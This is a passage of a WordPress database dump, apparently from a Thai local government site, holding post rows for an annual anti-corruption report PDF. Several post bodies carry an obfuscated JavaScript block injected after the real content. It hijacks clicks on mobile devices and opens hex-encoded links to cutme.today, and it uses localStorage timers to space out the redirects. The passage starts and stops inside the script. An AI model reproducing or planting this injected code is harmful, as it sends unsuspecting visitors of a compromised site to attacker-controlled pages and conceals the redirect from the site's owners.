_0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ITA ONLINE 2567','','inherit','closed','closed','','871-revision-v1','','','2024-08-20 20:06:44','2024-08-20 13:06:44','',871,'http://pakhaeng.ssk.in.th/?p=1015',0,'revision','',0),
(1016,1,'2024-08-21 09:28:44','2024-08-21 02:28:44','<!-- wp:file {\"id\":1017,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานการดำเนินการป้องกันการทุจริตประจำปี.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานการดำเนินการป้องกันการทุจริตประจำปี.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"รายงานการดำเนินการป้องกันการทุจริตประจำปี\"></object><a id=\"wp-block-file--media-6c032aad-1e28-4225-93ca-05aeb920ce59\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานการดำเนินการป้องกันการทุจริตประจำปี.pdf\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานการดำเนินการป้องกันการทุจริตประจำปี.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-6c032aad-1e28-4225-93ca-05aeb920ce59\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','รายงานการดำเนินการป้องกันการทุจริตประจำปี','','publish','closed','closed','','%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%94%e0%b8%b3%e0%b9%80%e0%b8%99%e0%b8%b4%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b9%89%e0%b8%ad%e0%b8%87','','','2024-08-21 09:28:45','2024-08-21 02:28:45','',0,'http://pakhaeng.ssk.in.th/?page_id=1016',0,'page','',0),
(1017,1,'2024-08-21 09:28:28','2024-08-21 02:28:28','','รายงานการดำเนินการป้องกันการทุจริตประจำปี','','inherit','','closed','','%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%94%e0%b8%b3%e0%b9%80%e0%b8%99%e0%b8%b4%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b9%89%e0%b8%ad%e0%b8%87','','','2024-08-21 09:28:28','2024-08-21 02:28:28','',1016,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานการดำเนินการป้องกันการทุจริตประจำปี.pdf',0,'attachment','application/pdf',0),
(1018,1,'2024-08-21 09:28:44','2024-08-21 02:28:44','<!-- wp:file {\"id\":1017,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานการดำเนินการป้องกันการทุจริตประจำปี.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานการดำเนินการป้องกันการทุจริตประจำปี.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"รายงานการดำเนินการป้องกันการทุจริตประจำปี\"></object><a id=\"wp-block-file--media-6c032aad-1e28-4225-93ca-05aeb920ce59\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานการดำเนินการป้องกันการทุจริตประจำปี.pdf\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานการดำเนินการป้องกันการทุจริตประจำปี.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-6c032aad-1e28-4225-93ca-05aeb920ce59\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 